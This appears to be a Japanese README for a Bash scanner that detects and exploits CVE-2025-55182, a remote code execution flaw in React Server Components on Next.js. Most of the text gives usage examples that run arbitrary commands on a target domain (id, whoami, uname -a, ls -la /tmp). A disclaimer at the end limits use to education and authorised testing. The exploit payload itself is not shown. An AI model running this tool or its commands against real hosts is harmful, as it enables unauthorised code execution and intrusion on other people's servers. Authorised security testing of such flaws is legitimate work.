
Bashベースのスキャナーで、Next.jsアプリケーションにおけるCVE-2025-55182(React Server Components RCE)の検出と悪用を行います。カスタムコマンドの実行とURLスキャンをサポートしています。
Next.js アプリケーションにおける CVE-2025-55182(React Server Components RCE)を検出および悪用するためのシンプルなコマンドラインツールです。

chmod +x scanner.sh
# デフォルトコマンド(id)でスキャン
./scanner.sh -d example.com
# カスタムコマンドの実行
./scanner.sh -d example.com -c "whoami"
# 完全なURLを指定
./scanner.sh -d https://example.com -c "uname -a"
-d, --domain - ターゲットのドメイン/URL(必須)-c, --command - 実行するコマンド(デフォルト: id)# ターゲットが脆弱かどうかを確認
./scanner.sh -d vulnerable-app.com
# システム情報を取得
./scanner.sh -d vulnerable-app.com -c "uname -a"
# ファイル一覧を表示
./scanner.sh -d vulnerable-app.com -c "ls -la /tmp"
このツールは教育目的および許可されたセキュリティテスト専用です。自分が所有していない、またはテストする許可がないシステムに対して使用しないでください。